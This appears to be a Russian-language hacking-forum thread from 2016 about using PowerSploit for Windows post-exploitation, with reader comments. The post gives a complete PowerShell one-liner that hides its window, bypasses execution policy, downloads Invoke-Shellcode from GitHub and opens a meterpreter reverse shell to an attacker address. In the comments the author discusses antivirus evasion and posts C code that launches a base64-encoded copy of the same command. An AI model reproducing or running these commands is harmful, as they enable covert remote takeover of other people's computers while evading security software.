PowerShell для хакера (часть I )

<~DarkNode~> · 24.11.2016

Часть 1

Следующая часть
Все части

Приветствую Вас колеги. Как Вы уже поняли речь пойдет о знакомствах с базовыми возможностями PowerShell и области применения хакерских техних.
И начнем мы пожалуй сегодня с использования скриптов PowerSploit -( скрипты написанные на PowerShell для пост эксплуатации Windows систем)

Первым примером использования PowerSploit - это будет пример простого и быстрого получения метерпретер сессии на примере скрипта Invoke-Shellcode.ps1

Для начало сходим на гитхаб по ссылке:

Код:

https://github.com/cheetz/PowerSploit/blob/master/CodeExecution/Invoke--Shellcode.ps1

Жмакним на клавишу RAW - что бы получить ссылку для скачивания в чистом виде

Код:

https://raw.githubusercontent.com/cheetz/PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1

Эту ссылку мы потом используем для нашей команды PowerShell,а пока можно в скрипте в комментариях увидеть опциональные параметры и примеры для его запуска:

Копируем урл нашего скрипта и готовим следующую команду:

Код:

Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.137.137 -Lport 1337 -Force

-NoP (--NoProfile) Не использовать пфрофиль powershell
-NonI (--NonInteractive) Не использовать интерактивный режим
-W Hidden ( --Window Hidden) Не показывать окно командной строки
-Exec Bypass ( Bypass Execution Policy) Разрешить подгружать и использовать скрипты из внешних ресурсов
IEX(New-Object Net.WebClient).DownloadString('url нашего скрипта') - Выполнить скрипт путем загрузки его по урл из удаленного ресурса и загрузки его в памяти
Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.137.137 -Lport 1337 -Force
Собственно вызов нашего скрипта после его загрузки с параметрами (IP аддрес и порт Атакуещей машини) и тип пейлоада метасплоита.

Собственно говоря и все)

Запускаем данную команду и к нам прилетает метерпретер сессия)
Можно еще для удобства сократить урл к скрипту на гитхабе через сервисы сокращения ссылок)

Всем спасибо) Продолжения следует)

Следующая часть
Все части

kot-gor · 25.11.2016

добрый вечер.а если данный скрипт допустим встроить в софт, как с детектом антивирусов у его?

Vander · 25.11.2016

kot-gor сказал(а):
добрый вечер.а если данный скрипт допустим встроить в софт, как с детектом антивирусов у его?

Присоединяюсь к вопросу...

<~DarkNode~> · 25.11.2016

Завтра сделаю тест на детект.Сорри сегодня не успеваю)

D8mbsniper · 25.11.2016

Неплохо.
Думаю такой скрипт с rubberducky должен "подружиться"

pappa · 26.11.2016

я полагаю если удаленно создать правило в исключениях фаервола то получится или я опять не права ?

kot-gor · 26.11.2016

pappa сказал(а):
я полагаю если удаленно создать правило в исключениях фаервола то получится или я опять не права ?

не обязательно...

ipmann · 29.11.2016

Symantec Endpoint Protection 12 этот скрипт прибивает..

kot-gor · 29.11.2016

Добрый день, ну не во всех же стоит Symantec Endpoint Protection,какие то скрипты будут пробиваться..)

freddie · 02.12.2016

а как открыть скрытый текст?

<~DarkNode~> · 03.12.2016

~~DarkNode~~ сказал(а):
Завтра сделаю тест на детект.Сорри сегодня не успеваю)

Извините за редкий онлайн. Увлекся лабораторией тестирования на проникновения от PentestIT. После окончания прохождения вернусь к вам мои дорогие друзья)))

InK · 04.12.2016

Огромное спасибо за статью, искал нечто подобное.

MAdDog719 · 05.12.2016

~~DarkNode~~ сказал(а):
Извините за редкий онлайн. Увлекся лабораторией тестирования на проникновения от PentestIT. После окончания прохождения вернусь к вам мои дорогие друзья)))

Пожалуйста напиши статью как проходил лабораторию.

fumpc18 · 07.12.2016

Спасибо за статью,не подкинете пару книг по powershell?

<~DarkNode~> · 07.12.2016

MAdDog719 сказал(а):
Пожалуйста напиши статью как проходил лабораторию.

Могу посвятить небольшой цикл статей в виде врайтапов по каждому токену(флагу) от моментов подключения до последнего токена.Как пользоваться картой топологии сети, простую логику поиска векторов уязвимости, и т.д
Имхо такие лаборатории очень наглядно демонстрируют известные векторы атак,и полезно попрактиковаться на них,так как команда специалистов делая лаборатории подбирают наиболее актуальные уязвимости которые попадают в статистику пентестов текущего года.
Если кому то будет интересно,то конечно могу)

valerian38 · 07.12.2016

~~DarkNode~~ сказал(а):
Могу посвятить небольшой цикл статей в виде врайтапов по каждому токену(флагу) от моментов подключения до последнего токена.Как пользоваться картой топологии сети, простую логику поиска векторов уязвимости, и т.д
Имхо такие лаборатории очень наглядно демонстрируют известные векторы атак,и полезно попрактиковаться на них,так как команда специалистов делая лаборатории подбирают наиболее актуальные уязвимости которые попадают в статистику пентестов текущего года.
Если кому то будет интересно,то конечно могу)

Если вы это сделаете, то я буду самым счастливым человеком на свете.

<~DarkNode~> · 09.12.2016

valerian38 сказал(а):
Если вы это сделаете, то я буду самым счастливым человеком на свете.

https://codeby.net/threads/laborato...-xakerskix-vozmozhnostej-1.58573/#post-267531

<~DarkNode~> · 10.12.2016

D8mbsniper сказал(а):
Неплохо.
Думаю такой скрипт с rubberducky должен "подружиться"

Обычно в этих целях его чаще используют)))

<~DarkNode~> · 13.12.2016

D8mbsniper сказал(а):
Неплохо.
Думаю такой скрипт с rubberducky должен "подружиться"

Вот этот скриптец должен лучше помочь :
https://codeby.net/threads/vashi-programmy-na-python.58124/#post-266525
Писал для удобства.

<~DarkNode~> · 14.12.2016

kot-gor сказал(а):
добрый вечер.а если данный скрипт допустим встроить в софт, как с детектом антивирусов у его?

Тестанул вот на детект,весьма не плохо, 2/35 (правда аваспом палится) Но можно в принципе достич и фуда (FuD) если небольшие манипуляции сделать

Ссылка скрыта от гостей

C:

#include <stdlib.h>

int main() {
    system("powershell.exe -NoP -NonI -W Hidden -Exec Bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AYwBoAGUAZQB0AHoALwBQAG8AdwBlAHIAUwBwAGwAbwBpAHQALwBtAGEAcwB0AGUAcgAvAEMAbwBkAGUARQB4AGUAYwB1AHQAaQBvAG4ALwBJAG4AdgBvAGsAZQAtAC0AUwBoAGUAbABsAGMAbwBkAGUALgBwAHMAMQAnACkAOwAgAEkAbgB2AG8AawBlAC0AUwBoAGUAbABsAGMAbwBkAGUAIAAtAFAAYQB5AGwAbwBhAGQAIAB3AGkAbgBkAG8AdwBzAC8AbQBlAHQAZQByAHAAcgBlAHQAZQByAC8AcgBlAHYAZQByAHMAZQBfAGgAdAB0AHAAcwAgAC0ATABoAG8AcwB0ACAAMQA5ADIALgAxADYAOAAuADIALgAxADAAMgAgAC0ATABwAG8AcgB0ACAAMQAzADMANwAgAC0ARgBvAHIAYwBlAA==");
    return 0;
}

Все сервисы Codeby

Поиск

Поиск

PowerShell для хакера (часть I )

<~DarkNode~>

~^M1st3r_Bert0ni^~

kot-gor

Well-known member

Vander

CodebyTeam

<~DarkNode~>

~^M1st3r_Bert0ni^~

D8mbsniper

pappa

kot-gor

Well-known member

ipmann

New member

kot-gor

Well-known member

freddie

<~DarkNode~>

~^M1st3r_Bert0ni^~

InK

MAdDog719

fumpc18

New member

<~DarkNode~>

~^M1st3r_Bert0ni^~

valerian38

<~DarkNode~>

~^M1st3r_Bert0ni^~

<~DarkNode~>

~^M1st3r_Bert0ni^~

<~DarkNode~>

~^M1st3r_Bert0ni^~

<~DarkNode~>

~^M1st3r_Bert0ni^~